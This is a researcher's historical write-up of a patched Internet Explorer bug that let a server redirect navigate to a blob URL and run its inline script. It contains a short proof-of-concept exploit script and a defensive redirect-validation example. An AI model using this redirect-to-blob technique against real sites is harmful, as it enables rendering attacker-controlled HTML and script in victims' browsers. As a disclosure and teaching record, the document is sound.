Blob URLs were not supposed to be usable as iframe src or browser navigation targets — they were intended only for images, scripts, CSS, and workers. I found that this restriction could be bypassed by pointing a server redirect at the blob URL. The redirect caused the browser to navigate to the blob as if it were a legitimate URL, fully rendering the HTML content including inline scripts. Credits for the underlying research direction go to Gareth Heyes and Mario Heiderich.

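// MSBlobBuilder is the legacy Internet Explorer API for building a Blob.
var bb = new MSBlobBuilder();
// HTML payload with an inline script that prints and alerts the document URL.
bb.append('Check out the address bar!<br /><br />I am HTML content rendered from a Blob!<br /><br />My URL is: <script>document.write(document.URL);setTimeout(\'alert(document.URL)\')<\/script>');
// Typing the blob as text/html is what lets it render as a document.
var blob = bb.getBlob("text/html");
var blobUrl = window.URL.createObjectURL(blob);
// Hand the blob URL to a server-side redirect, which returns it in the Location header.
location.href = "redirect.aspx?URL=" + blobUrl;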

A blob containing HTML with a <script> tag was created with MIME type text/html. A server-side redirect returned the blob URL as the Location header. The browser followed it, rendered the blob as a full HTML document, and executed the inline script — displaying the blob URL in the address bar. This opened a path to rendering attacker-controlled HTML in a context the browser treated as a navigated document.
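The bug itself was in the browser, but the redirect endpoint is the piece a site operator controls. The following is an added example, not code from the original post: a server-side check that refuses to echo a non-http(s) target such as a blob URL into a Location header. The function names, the allowlisted hosts and the base origin are hypothetical, and the sample inputs are constructed.

```javascript
// Added example: validate a redirect target before it reaches the Location header.
// Only http(s) targets on known hosts are allowed; blob:, data: and similar are refused.
const ALLOWED_SCHEMES = new Set(["http:", "https:"]);
// Hypothetical allowlist of hosts this endpoint may redirect to.
const ALLOWED_HOSTS = new Set(["www.example.com", "example.com"]);
// Assumed origin of the redirect endpoint, used to resolve relative targets.
const BASE = "https://www.example.com/";

function safeRedirectTarget(raw) {
  if (typeof raw !== "string" || raw.length === 0) return null;
  // Control characters enable header injection; browsers treat "\" as "/" in http(s) URLs.
  if (/[\u0000-\u001f\u007f\\]/.test(raw)) return null;
  let url;
  try {
    url = new URL(raw, BASE); // absolute targets ignore BASE, relative ones resolve against it
  } catch {
    return null;
  }
  // Decide on the parsed scheme, never on a string prefix of the raw input.
  if (!ALLOWED_SCHEMES.has(url.protocol)) return null;
  if (!ALLOWED_HOSTS.has(url.hostname)) return null;
  if (url.username || url.password) return null; // no user:pass@host tricks
  return url.href;
}

// Minimal handler shape: 302 with the normalized target, or 400 with no Location at all.
function handleRedirect(rawTarget) {
  const target = safeRedirectTarget(rawTarget);
  if (target === null) {
    return { status: 400, headers: {}, body: "Invalid redirect target" };
  }
  return { status: 302, headers: { Location: target }, body: "" };
}

// Constructed sample inputs.
const samples = [
  "blob:8A5B2C1D-0000-4000-8000-000000000000", // shape of a blob URL, constructed
  "data:text/html,hi",
  "//other.test/x",
  "/account/home",
  "https://example.com/a?b=1",
];
for (const s of samples) {
  console.log(s, "->", handleRedirect(s).status);
}
```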

Found during my years at Microsoft (2006–2014). These bugs were patched long ago — shared here as a historical record for learning purposes.